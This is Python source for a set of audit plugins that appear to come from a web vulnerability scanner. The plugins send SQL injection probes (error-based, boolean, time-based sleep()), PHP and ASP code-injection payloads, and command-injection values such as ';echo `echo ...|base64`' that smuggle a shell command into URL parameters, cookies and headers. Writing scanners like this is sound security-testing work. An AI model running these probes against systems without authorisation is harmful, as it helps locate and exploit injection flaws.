def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
if "Warning" in resp_str and "array given" in resp_str:
out.success(url, self.name)
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
del data[k]
data[k + "[]"] = v
try:
_ = prepare_url(netloc, params=data)
r = requests.get(_, headers=headers)
if "Warning" in r.text and "array given" in r.text:
out.success(_, self.name)
except:
pass
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode() # POST 数据
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
if method == 'GET':
# 从源码中获取更多链接
links = [url]
for link in set(links):
# 只接收指定类型的SQL注入
p = urlparse(link)
if p.query == '':
continue
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
continue
params = dict()
for i in p.query.split("&"):
try:
key, value = i.split("=")
params[key] = value
except ValueError:
pass
netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)
for k, v in params.items():
if k.lower() in ignoreParams:
continue
if not re.search('^-?\d+(\.\d+)?$', v):
continue
data = copy.deepcopy(params)
# 判断条件:
# 1. -randint !== origin
# 2. +randint-randint == origin
payload1 = "{0}+{1}".format(v, random.randint(10, 100))
data[k] = payload1
url1 = prepare_url(netloc, params=data)
if Share.in_url(url1):
continue
Share.add_url(url1)
r = requests.get(url1, headers=headers)
html1 = r.text
if fuzzy_equal(resp_str, html1, 0.97):
continue
payload2 = "{0}+{1}-{1}".format(v, random.randint(10, 100))
data[k] = payload2
r2 = requests.get(netloc, params=data, headers=headers)
html2 = r2.text
if fuzzy_equal(resp_str, html2, 0.8):
msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(
k=k, v=v, v1=payload1, v2=payload2)
# out.log(msg)
out.success(link, self.name, payload=k, condition=msg)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
# 从源码中获取更多链接
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
sql_flag = [
"/**/and'{0}'='{1}'",
"'and'{0}'='{1}",
'"and"{0}"="{1}',
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for flag in sql_flag:
# true page
rand_str = random_str(2)
payload1 = v + flag.format(rand_str, rand_str)
data[k] = payload1
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
radio = GetRatio(resp_str, html1)
if radio < 0.88:
continue
# false page
payload2 = v + flag.format(random_str(2), random_str(2))
data[k] = payload2
r2 = requests.get(netloc, params=data, headers=headers)
html2 = r2.text
radio = GetRatio(resp_str, html2)
if radio < 0.78:
msg = "{k}:{v} === {k}:{v1} and {k}:{v} !== {k}:{v2}".format(
k=k, v=v, v1=payload1, v2=payload2)
# out.log(msg)
out.success(url,
self.name,
payload=k,
condition=msg,
raw=[r.raw, r2.raw])
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
# cookie
sql_flag = '鎈\'"\('
if headers and "cookie" in headers:
cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE)
del headers["cookie"]
if cookies:
for k, v in cookies.items():
cookie = copy.deepcopy(cookies)
cookie[k] = v + sql_flag
r = requests.get(url, headers, cookies=urlencode(cookie))
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(r.text)
if match:
out.success(url,
self.name,
payload="cookie: {}={}".format(
k, cookie[k]),
dbms_type=dbms_type,
raw=r.raw)
break
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
data[k] = v + sql_flag
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html = r.text
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(html)
if match:
out.success(url,
self.name,
payload="{}={}".format(k, data[k]),
dbms_type=dbms_type,
raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
sql_flag = [
"'and(select+sleep({time})union/**/select+1)='",
'"and(select+sleep({time})union/**/select+1)="',
'/**/and(select+sleep({time})union/**/select+1)'
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for flag in sql_flag:
# first request
payload1 = flag.format(time=0)
data[k] = v + payload1
url1 = prepare_url(netloc, params=data)
_ = time.time()
r = requests.get(url1, headers=headers)
html1 = r.text
elapsed = time.time() - _
# second request
payload2 = flag.format(time=2)
data[k] = v + payload2
_ = time.time()
r2 = requests.get(netloc, params=data, headers=headers)
html2 = r2.text
elapsed2 = time.time() - _
if elapsed2 - elapsed > 1.5:
msg = " {k}:{v1} 耗时 {time1}s; {k}:{v2} 耗时 {time2}s".format(
k=k,
v1=payload1,
v2=payload2,
time1=elapsed,
time2=elapsed2)
# out.log(msg)
out.success(url, self.name, payload=k, condition=msg)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
randint = random.randint(1000, 9000)
url_flag = {
"set|set&set": [
'Path=[\s\S]*?PWD=',
'Path=[\s\S]*?PATHEXT=',
'Path=[\s\S]*?SHELL=',
'Path\x3d[\s\S]*?PWD\x3d',
'Path\x3d[\s\S]*?PATHEXT\x3d',
'Path\x3d[\s\S]*?SHELL\x3d',
'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=',
'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d',
'Non-authoritative\sanswer:\s+Name:\s*',
'Server:\s*.*?\nAddress:\s*'
],
"echo `echo 6162983|base64`6162983".format(randint): [
"NjE2Mjk4Mwo=6162983"
]
}
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for spli in ['', ';']:
for flag, re_list in url_flag.items():
if spli == "":
data[k] = flag
else:
data[k] = v + spli + flag
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
for rule in re_list:
if re.search(rule, html1, re.I | re.S | re.M):
out.success(url, self.name, payload="{}:{}".format(k, data[k]), raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
regx = 'Parse error: syntax error,.*?\sin\s'
randint = random.randint(1, 256)
verify_result = md5(str(randint).encode())
payloads = [
"print(md5({}));", ";print(md5({}));", "';print(md5({}));$a='",
"\";print(md5({}));$a=\"", "${{@print(md5({}))}}",
"${{@print(md5({}))}}\\"
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for payload in payloads:
if payload[0] == "p":
data[k] = payload.format(randint)
else:
data[k] = v + payload.format(randint)
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
if verify_result in html1:
out.success(url,
self.name,
payload="{}:{}".format(k, data[k]))
break
if re.search(regx, html1, re.I | re.S | re.M):
out.success(url,
self.name,
payload="{}:{}".format(k, data[k]))
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode() # POST 数据
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
if method == 'GET':
# 从源码中获取更多链接
links = get_links(resp_str, url, True)
links.append(url)
for link in set(links):
# 只接收指定类型的SQL注入
p = urlparse(link)
if p.query == '':
continue
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
continue
params = dict()
for i in p.query.split("&"):
try:
key, value = i.split("=")
params[key] = value
except ValueError:
pass
netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)
sql_flag = '鎈\'"\('
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
data[k] = v + sql_flag
url1 = prepare_url(netloc, params=data)
if Share.in_url(url1):
continue
Share.add_url(url1)
r = requests.get(url1, headers=headers)
html = r.text
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(html)
if match:
out.success(link,
self.name,
payload="{}={}".format(k, data[k]))
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
randint1 = random.randint(10000, 90000)
randint2 = random.randint(10000, 90000)
randint3 = randint1 * randint2
payloads = [
'response.write({}*{})'.format(randint1, randint2),
'\'+response.write({}*{})+\''.format(randint1, randint2),
'"response.write({}*{})+"'.format(randint1, randint2),
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for payload in payloads:
if payload[0] == "":
data[k] = payload
else:
data[k] = v + payload
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
if str(randint3) in html1:
out.success(url,
self.name,
payload="{}:{}".format(k, data[k]),
raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
for k, v in params.items():
if k.lower() in ignoreParams:
continue
if not re.search('^-?\d+(\.\d+)?$', v):
continue
data = copy.deepcopy(params)
# 判断条件:
# 1. -randint !== origin
# 2. +randint-randint == origin
payload1 = "{0}+{1}".format(v, random.randint(10, 100))
data[k] = payload1
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
if fuzzy_equal(resp_str, html1, 0.87):
continue
payload2 = "{0}+{1}-{1}".format(v, random.randint(10, 100))
data[k] = payload2
r2 = requests.get(netloc, params=data, headers=headers)
html2 = r2.text
if fuzzy_equal(resp_str, html2, 0.8):
msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(
k=k, v=v, v1=payload1, v2=payload2)
out.success(url, self.name, payload=k, condition=msg)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode() # POST 数据
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = urlparse(url)
# 判断带有php或无后缀的
basepath = os.path.basename(p.path)
if "." in basepath and ".php" not in basepath:
return
if "Warning" in resp_str and "array given" in resp_str:
out.success(url, self.name)
params = dict()
for i in p.query.split("&"):
try:
key, value = i.split("=")
params[key] = value
except ValueError:
pass
netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
del data[k]
data[k + "[]"] = v
try:
_ = prepare_url(netloc, params=data)
if Share.in_url(_):
continue
Share.add_url(_)
r = requests.get(_, headers=headers)
if "Warning" in r.text and "array given" in r.text:
out.success(_, self.name)
except:
pass
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
sql_flag = '鎈\'"\('
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
data[k] = v + sql_flag
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html = r.text
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(html)
if match:
out.success(url,
self.name,
payload="{}={}".format(k, data[k]))
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode() # POST 数据
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
if method == 'GET':
# 从源码中获取更多链接
links = [url]
for link in set(links):
# 只接收指定类型的SQL注入
p = urlparse(link)
if p.query == '':
continue
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
continue
params = dict()
for i in p.query.split("&"):
try:
key, value = i.split("=")
params[key] = value
except ValueError:
pass
netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)
sql_flag = [
"'and'{0}'='{1}",
'"and"{0}"="{1}'
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for flag in sql_flag:
# true page
rand_str = random_str(2)
payload1 = flag.format(rand_str, rand_str)
data[k] = v + payload1
url1 = prepare_url(netloc, params=data)
if Share.in_url(url1):
continue
Share.add_url(url1)
r = requests.get(url1, headers=headers)
html1 = r.text
radio = GetRatio(resp_str, html1)
if radio < 0.88: # 相似度随手一设~
continue
# false page
payload2 = flag.format(random_str(2), random_str(2))
data[k] = v + payload2
r2 = requests.get(netloc, params=data, headers=headers)
html2 = r2.text
radio = GetRatio(resp_str, html2)
if radio < 0.68: # 相似度随手设置
msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(k=k, v=v, v1=payload1,
v2=payload2)
# out.log(msg)
out.success(link, self.name, payload=k, condition=msg)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
# cookie
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
origin_len = len(resp_str)
sql_flag = '鎈\'"\('
if headers and "cookie" in headers:
cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE)
tmp_headers = copy.deepcopy(headers)
del tmp_headers["cookie"]
if cookies:
for k, v in cookies.items():
cookie = copy.deepcopy(cookies)
cookie[k] = v + sql_flag
r = requests.get(url,
headers=tmp_headers,
cookies=urlencode(cookie))
if origin_len == len(r.text):
continue
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(r.text)
if match:
out.success(url,
self.name,
payload="cookie: {}={}".format(
k, cookie[k]),
dbms_type=dbms_type,
raw=r.raw)
break
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
data[k] = v + sql_flag
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html = r.text
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(html)
if match:
out.success(url,
self.name,
payload="{}={}".format(k, data[k]),
dbms_type=dbms_type,
raw=r.raw,
errinfo=match.group())
break
# test header
if headers:
sql_flag = '\'"\('
new_headers = {
"User-Agent":
headers.get("User-Agent", "") + sql_flag,
"referer":
headers.get("referer", url) + sql_flag,
"x-forwarded-for":
headers.get("x-forwarded-for", "127.0.0.1") + sql_flag,
"via":
headers.get("via", "") + sql_flag
}
r = requests.get(url, headers=new_headers)
html = r.text
if origin_len == len(html):
return
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(html)
if match:
out.success(url,
self.name,
type="header inject",
dbms_type=dbms_type,
raw=r.raw,
errinfo=match.group())
break
